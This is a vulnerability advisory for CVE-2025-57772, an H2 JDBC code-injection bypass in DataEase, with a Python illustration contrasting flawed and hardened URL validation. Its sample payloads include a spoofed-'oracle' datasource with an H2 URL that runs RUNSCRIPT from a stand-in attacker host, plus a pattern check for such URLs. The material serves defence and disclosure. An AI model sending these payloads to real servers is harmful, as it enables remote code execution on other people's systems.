CVE-2025-57772
Published: 25 August 2025
Summary
CVE-2025-57772 is a critical-severity Code Injection (CWE-94) vulnerability in DataEase. Its CVSS v3.1 base score is 9.8 (Critical).
Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks at the 43.9th percentile by exploit likelihood (below the median), is not currently listed in the CISA KEV catalog, and a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 RA-5 (Vulnerability Monitoring and Scanning) and SI-10 (Information Input Validation).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
- Flaw remediation: directly mitigates the H2 JDBC RCE by requiring identification, reporting, and timely patching to version 2.10.12 or later.
- SI-10 (Information Input Validation): prevents exploitation by enforcing validation of JDBC URL inputs, so a request cannot sidestep the H2 filtering logic by declaring a different datasource type.
- RA-5 (Vulnerability Monitoring and Scanning): detects CVE-2025-57772 through regular scanning and drives remediation before it can be exploited.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Exploit Public-Facing Application (T1190): CVE-2025-57772 is a remote code execution vulnerability in the public-facing DataEase web application. A crafted POST to /de2api/datasource/validate declares a spoofed datasource type of 'oracle' while supplying the H2 driver and an H2 JDBC URL; the H2 JDBC filtering is skipped for that type, and the resulting H2 connection executes attacker-controlled scripts. This rationale describes the request as authenticated, whereas the CVSS vector (PR:N) scores the flaw as requiring no privileges; check which applies to your deployment against the GitHub advisory before prioritizing.
NVD Description
DataEase is an open source business intelligence and data visualization tool. Prior to version 2.10.12, there is a H2 JDBC RCE bypass in DataEase. If the JDBC URL meets criteria, the getJdbcUrl method is returned, which acts as the getter for the JdbcUrl parameter provided. This bypasses H2's filtering logic and returns the H2 JDBC URL, allowing the "driver":"org.h2.Driver" to specify the H2 driver for the JDBC connection. The vulnerability has been fixed in version 2.10.12.
Deeper analysis
CVE-2025-57772 is a remote code execution (RCE) vulnerability in DataEase, an open source business intelligence and data visualization tool. It affects versions prior to 2.10.12 and stems from a bypass of the H2 JDBC URL filtering in the application's datasource handling. When the submitted JDBC URL meets certain criteria, the getJdbcUrl method returns the caller's JdbcUrl parameter unchanged, so H2's built-in filtering logic never runs on it. The caller can then pair that URL with "driver":"org.h2.Driver", and the H2 connection DataEase opens is what yields arbitrary code execution. The vulnerability is classified under CWE-94 (Improper Control of Generation of Code) with a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Per the CVSS vector, the flaw is exploitable remotely over the network with low attack complexity, no privileges, and no user interaction. By crafting a JDBC URL that evades the filter, an attacker can make DataEase establish a JDBC connection with the H2 driver, leading to full RCE on the DataEase server. Successful exploitation has high impact on confidentiality, integrity, and availability, potentially allowing full system compromise.
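As an added illustration (not DataEase code and not the fixing commit), the Python below models the check described above: a getter that screens H2 URLs only when the request's declared type is "h2", beside a hardened getter that validates the effective driver class and URL scheme against a per-type allowlist and screens any H2 URL regardless of what the client claims. The field names (type, driver, jdbcUrl), the allowlist, the modelled "criteria" (declared type is not h2), and the sample payloads are assumptions constructed for this example, not DataEase's own values.

```python
import re

# Allowlist: declared datasource type -> (driver class, JDBC URL prefix).
# Assumption for the example; DataEase's real table is not reproduced here.
ALLOWED = {
    "mysql": ("com.mysql.cj.jdbc.Driver", "jdbc:mysql:"),
    "oracle": ("oracle.jdbc.OracleDriver", "jdbc:oracle:"),
    "h2": ("org.h2.Driver", "jdbc:h2:"),
}


def h2_url_is_safe(url: str) -> bool:
    """Reject H2 URLs that run SQL at connect time (INIT=... / RUNSCRIPT)."""
    lowered = url.lower()
    if re.search(r"(?:^|;)\s*init\s*=", lowered):
        return False
    return "runscript" not in lowered


def vulnerable_get_jdbc_url(ds: dict) -> str:
    """Model of the flawed getter: H2 screening keyed on the *declared* type.

    Assumption: the 'criteria' under which the raw URL is returned untouched is
    simply that the declared type is not 'h2'.
    """
    url = ds["jdbcUrl"]
    if ds["type"] == "h2" and not h2_url_is_safe(url):
        raise ValueError("h2 url rejected")
    return url  # any other declared type: user-supplied URL returned as-is


def hardened_get_jdbc_url(ds: dict) -> str:
    """Validate on what the connection would actually do, not on the label."""
    dtype = ds.get("type", "")
    driver = ds.get("driver", "")
    url = ds.get("jdbcUrl", "")
    if dtype not in ALLOWED:
        raise ValueError(f"unsupported datasource type {dtype!r}")
    want_driver, want_prefix = ALLOWED[dtype]
    if driver and driver != want_driver:
        raise ValueError(f"driver {driver!r} not allowed for type {dtype!r}")
    if not url.lower().startswith(want_prefix):
        raise ValueError(f"jdbc url scheme does not match type {dtype!r}")
    # Defense in depth: screen every H2 URL, whatever type the client declared.
    if url.lower().startswith("jdbc:h2:") and not h2_url_is_safe(url):
        raise ValueError("h2 url rejected")
    return url


def evaluate(ds: dict) -> dict:
    """Run both getters over one payload; 'connect:<url>' or 'reject:<reason>'."""
    out = {}
    for name, fn in (("vulnerable", vulnerable_get_jdbc_url),
                     ("hardened", hardened_get_jdbc_url)):
        try:
            out[name] = "connect:" + fn(ds)
        except ValueError as exc:
            out[name] = "reject:" + str(exc)
    return out


# Constructed sample payloads (not captured traffic). attacker.example is a placeholder.
H2_SCRIPT_URL = "jdbc:h2:mem:x;INIT=RUNSCRIPT FROM 'http://attacker.example/x.sql'"
SAMPLES = {
    "legit_mysql": {"type": "mysql", "driver": "com.mysql.cj.jdbc.Driver",
                    "jdbcUrl": "jdbc:mysql://db.internal:3306/sales"},
    "honest_h2_init": {"type": "h2", "driver": "org.h2.Driver", "jdbcUrl": H2_SCRIPT_URL},
    "spoofed_oracle": {"type": "oracle", "driver": "org.h2.Driver", "jdbcUrl": H2_SCRIPT_URL},
    "spoofed_oracle_no_driver": {"type": "oracle", "jdbcUrl": H2_SCRIPT_URL},
}

if __name__ == "__main__":
    for label, payload in SAMPLES.items():
        print(f"{label:26s} {evaluate(payload)}")
```

The honest H2 payload is caught by both getters; the spoofed "oracle" payload passes the vulnerable one untouched and is rejected by the hardened one on the driver mismatch (or, when no driver is sent, on the URL scheme). The practical lesson for SI-10 is that the validation key must be the driver and URL the server will actually use, never a type string the client chose.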
The vulnerability has been fixed in DataEase version 2.10.12. Security practitioners should upgrade to this version or later. Additional details are available in the official GitHub security advisory (GHSA-v37q-vh67-9rqv) and the fixing commit (1644d81dff46272b09570fa1f4a8f83f01f37440).
Details
- CWE(s)